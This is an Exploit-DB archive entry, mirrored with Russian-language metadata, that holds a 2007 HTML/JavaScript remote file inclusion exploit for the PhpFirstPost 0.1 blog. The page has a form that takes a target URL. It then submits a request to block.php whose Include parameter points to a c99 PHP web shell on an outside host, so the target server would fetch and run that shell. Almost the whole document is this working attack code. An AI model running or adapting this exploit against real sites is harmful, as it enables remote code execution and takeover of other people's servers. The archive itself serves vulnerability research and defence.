- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3906
- Проверка EDB
-
- Пройдено
- Автор
- DJ7XPL
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-2665 cve-2005-2412
- Дата публикации
- 2007-05-12
HTML:
<html>
<head>
<title>..:: PhpFirstPost blog Remote File Include Exploit ::..</title>
<script language="JavaScript">
/*
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo---------------------------------------------------
[ Y! Underground Group ]
[ [email protected] ]
[ Dj7xpl.2600.ir ]
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
---------------------------------------------------------------------
[!] Portal : PhpFirstPost 0.1
[!] Download : http://sourceforge.net/projects/phpfirstpost/
[!] Type : Remote File Include Exploit
---------------------------------------------------------------------
*/
var path="/"
var adress="block.php?"
var include ="Include="
var phpshell="http://dj7xpl.by.ru/shell/c99.php?"
function command(){
if (document.rfi.target1.value==""){
alert("Exploit Failed...");
return false;
}
rfi.action= document.rfi.target1.value+path+adress+include+phpshell;
rfi.submit();
}
</script>
</head>
<body bgcolor="#198ccd">
<center>
<p></p>
<form method="post" target="getting" name="rfi" onSubmit="command();">
<b><font face="batangche" size="3" color="white">Target:</font><font
face="Arial" size="2"
color="white">http://Target.ir/blog</font><br><br>
<font color="#00FF00"size="+1" face="batangche">
</font>
<font color="red" size="2"></font></b>
<input type="text" name="target1" size="20" style="background-color:
white" onmouseover="javascript:this.style.background='red';"
onmouseout="javascript:this.style.background='red';"></p>
<p>
<input type="submit" value="Go -->" name="B1">
<input type="reset" value="Clear" name="B2"></p>
</form>
<p><br>
<iframe name="getting" height="337" width="633" scrolling="yes"
frameborder="0"></iframe>
</p><br><br>
<p><font color="red" size="2" face="batang">Dj7xpl @ Yahoo . com </font></p>
</center>
</body>
</html>
# milw0rm.com [2007-05-12]
- Источник
- www.exploit-db.com